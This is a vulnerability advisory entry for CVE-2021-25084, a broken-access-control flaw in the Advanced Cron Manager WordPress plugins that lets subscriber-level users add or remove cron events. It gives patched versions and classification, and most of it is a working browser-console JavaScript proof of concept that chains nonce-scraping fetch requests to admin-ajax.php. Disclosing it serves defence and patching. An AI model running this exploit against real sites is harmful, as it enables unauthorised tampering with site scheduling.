WordPress Plugin Vulnerabilities

Advanced Cron Manager - Subscriber+ Arbitrary Events/Schedules Creation/Deletion

Description

The plugins do not have authorisation checks in some of their AJAX actions, allowing any authenticated users, such as subscriber to call them and add or remove events as well as schedules for example

Proof of Concept

Execute the below command in the web developer console of the web browser when being logged in as any user (such as subscriber). This will create an example_hook schedule

fetch("http://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action":"acm/rerender/events"}),
  "method": "POST",
  "credentials": "include"
})
  .then(response => response.text())
  .then(function(data) {
    const page_nonce = data.match(/<a href=\\"#\\" class=\\"add-event page-title-action\\" data-nonce=\\"([0-9a-f]*)\\">Add new event<\\\/a>/)[1];

    fetch("http://example.com/wp-admin/admin-ajax.php", {
      "headers": {
        "content-type": "application/x-www-form-urlencoded",
      },
      "body": new URLSearchParams({"action":"acm/event/add/form", "nonce": page_nonce}),
      "method": "POST",
      "credentials": "include"
    })
    .then(response => response.text())
    .then(function(data) {
        const submit_nonce = data.match(/<input type=\\"hidden\\" id=\\"nonce\\" name=\\"nonce\\" value=\\"([0-9a-f]*)\\"/)[1];

        fetch("http://example.com/wp-admin/admin-ajax.php", {
          "headers": {
            "content-type": "application/x-www-form-urlencoded",
          },
          "body": new URLSearchParams({"action":"acm/event/add/form", "nonce": page_nonce}),
          "method": "POST",
          "credentials": "include"
        })
        .then(response => response.text())
        .then(function(data) {
          fetch("http://example.com/wp-admin/admin-ajax.php", {
            "headers": {
              "content-type": "application/x-www-form-urlencoded",
            },
            "body": new URLSearchParams({"action":"acm/event/insert", "nonce": submit_nonce, "data": "execution_offset=2&hook=example_hook&schedule=hourly"}),
            "method": "POST",
            "credentials": "include"
          })
          .then(response => response.text())
          .then(function(data) {
            console.log(data);
          });
        });
    });
  });

Affects Plugins

Plugin icon
advanced-cron-manager
Fixed in 2.4.2
Plugin icon
advanced-cron-manager-pro
Fixed in 2.5.3

References

CVE
CVE-2021-25084

Classification

Type
ACCESS CONTROLS
OWASP top 10
A5: Broken Access Control
CWE
CWE-284
CVSS
5.4 (medium)

Miscellaneous

Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
https://kazet.cc/
Verified
Yes
WPVDB ID
7c5c602f-499f-431b-80bc-507053984a06

Timeline

Publicly Published
2022-01-04 (about 2 years ago)
Added
2022-01-04 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)

Other

Published
Title
Published
2021-03-24
Title
All Thrive Themes and Plugins - Unauthenticated Option Update
Published
2024-01-24
Title
Views for WPForms < 3.2.3 - Cross-Site Request Forgery via save_view
Published
2021-07-07
Title
WP Upload Restriction < 2.2.5 - Missing Access Control in deleteCustomType
Published
2024-01-24
Title
Views for WPForms < 3.2.3 - Missing Authorization via create_view
Published
2021-03-17
Title
WP Page Builder < 1.2.4 - Insecure default configuration Allows Subscribers Editing Access to Posts